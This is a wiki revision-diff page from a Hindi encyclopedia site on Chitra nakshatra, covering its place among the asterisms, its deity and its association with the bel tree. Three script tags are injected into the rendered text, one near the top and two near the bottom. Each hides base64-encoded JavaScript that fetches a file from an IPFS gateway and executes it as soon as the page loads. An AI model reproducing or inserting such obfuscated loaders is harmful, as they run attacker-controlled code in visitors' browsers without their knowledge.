Difference between revisions of "चित्रा नक्षत्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
{{बहुविकल्प|बहुविकल्पी शब्द=चित्रा|लेख का नाम=चित्रा (बहुविकल्पी)}}
 
{{बहुविकल्प|बहुविकल्पी शब्द=चित्रा|लेख का नाम=चित्रा (बहुविकल्पी)}}
 +
आकाशीय मंडल में चौदहवाँ [[नक्षत्र]] है। इस नक्षत्र के प्रथम दो चरण कन्या राशि में आते हैं।
 
<poem>अर्थ - देदीप्यमान
 
<poem>अर्थ - देदीप्यमान
 
देव - त्वश्त्र</poem>
 
देव - त्वश्त्र</poem>
*आकाशीय मंडल में चौदहवाँ [[नक्षत्र]] है।
 
*इस नक्षत्र के प्रथम दो चरण कन्या राशि में आते हैं।
 
 
*चित्रा में [[इन्द्र]] का व्रत और पूजन किया जाता है।
 
*चित्रा में [[इन्द्र]] का व्रत और पूजन किया जाता है।
 
*चित्रा नक्षत्र के देवता [[चित्रगुप्त देवता|चित्रगुप्त]] को माना जाता है।  
 
*चित्रा नक्षत्र के देवता [[चित्रगुप्त देवता|चित्रगुप्त]] को माना जाता है।  
Line 9: Line 8:
 
*इस नक्षत्र में जन्म लेने वाले लोग अपने घर के ख़ाली हिस्से में बेल के पेड  को लगाते है।
 
*इस नक्षत्र में जन्म लेने वाले लोग अपने घर के ख़ाली हिस्से में बेल के पेड  को लगाते है।
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 17: Line 15:
 
|शोध=
 
|शोध=
 
}}
 
}}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{नक्षत्र}}
 
{{नक्षत्र}}
{{काल गणना}}
 
 
[[Category:ग्रह-नक्षत्र ज्योतिष]]
 
[[Category:ग्रह-नक्षत्र ज्योतिष]]
 
[[Category:पौराणिक_कोश]]
 
[[Category:पौराणिक_कोश]]
 
[[Category:काल गणना]]
 
[[Category:काल गणना]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:45, 3 May 2012

chitr:Disamb2.jpg chitra ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- chitra (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

akashiy mandal mean chaudahavaan nakshatr hai. is nakshatr ke pratham do charan kanya rashi mean ate haian.

arth - dedipyaman
dev - tvashtr

  • chitra mean indr ka vrat aur poojan kiya jata hai.
  • chitra nakshatr ke devata chitragupt ko mana jata hai.
  • bel ke pe d ko chitra nakshatr ka pratik mana jata hai aur chitra nakshatr mean janm lene vale log bel vriksh ki pooja karate hai.
  • is nakshatr mean janm lene vale log apane ghar ke khali hisse mean bel ke ped ko lagate hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh